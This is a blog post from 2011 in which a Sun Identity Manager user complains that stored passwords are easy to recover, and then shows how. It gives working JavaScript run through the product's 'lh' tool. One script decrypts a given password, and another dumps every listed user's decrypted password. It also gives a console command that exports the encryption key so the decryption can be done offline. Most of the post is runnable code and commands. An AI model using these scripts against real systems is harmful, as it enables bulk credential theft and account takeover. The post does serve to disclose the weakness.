Extracting encrypted passwords from Sun Identity Manager

, posted: 2-Nov-2011 20:25

For my sins I am using Sun IDM.  And I was somewhat disappointed at how easy it is to extract any password from Sun IDM without needing any authentication.  As long as you have comand line access to call the LH you can extract the configurator password.  Here are a few links I found on this topic.

http://www.darkedges.com/blog/?p=7
http://zerointechnologies.com/sun-idm-decrypt-password.html

The second link includes the javascript code needed, but a session needs to be established first.  So this is the modified code I used.

/* Decrypt Sun IDM Passwords */
importPackage(Packages.com.waveset.util);
importPackage(Packages.com.waveset.server);
var _lhSession = new InternalSession();
print("Encrypted = " + arguments[0]);
var pwd = new EncryptedData();
pwd.fromString(arguments[0]);
print("Decrypted = " + pwd.decryptToString());
/* End */

Then have the above script called pwd.js.  Calling it as shown below:

./lh js pwd.js "3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw=="
Encrypted = 3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw==
Decrypted = configurator


So... to get the encrypted password you want, a modified version of the JS to take an input file and return the passwords:

/* Decrypt Sun IDM Passwords */
importPackage(Packages.java.util);
importPackage(Packages.java.io);
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
importPackage(Packages.com.waveset.util);
var _lhSession = new InternalSession();
var file = new FileReader(arguments[0]);
var br = new BufferedReader(file);
var line;
while ((line = br.readLine()) != null) {
var obj = _lhSession.getObject(Type.USER, line);
var pwd = new EncryptedData();
pwd.fromString(obj.getAttribute("password"));
print(obj.getName() + "," + pwd.decryptToString());
}
/* End */

Plus i've now got the offline decryption working too by extracting out the encryption key:

$WSHOME/bin/lh console -c "getObject EncryptionKey *"

And the Misc data:

/* Extract Misc Data */
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
var _lhSession = new InternalSession();
var obj = _lhSession.getObject(Type.MISCELLANEOUS, "miscData");
print("Result" + obj.toXml());
/* End */

Then call the javascript:

$WSHOME/bin/lh js misc.js

Using the code shown above from Dark Edges.

Sad.. But true.








Add a comment

Please note: comments that are inappropriate or promotional in nature will be deleted. E-mail addresses are not displayed, but you must enter a valid e-mail address to confirm your comments.

Are you a registered Geekzone user? Login to have the fields below automatically filled in for you and to enable links in comments. If you have (or qualify to have) a Geekzone Blog then your comment will be automatically confirmed and placed in the moderation queue for the blog owner's approval.

Your name:

Your e-mail:

Your webpage:

BarTender's profile

Bar Tender
Wellington
New Zealand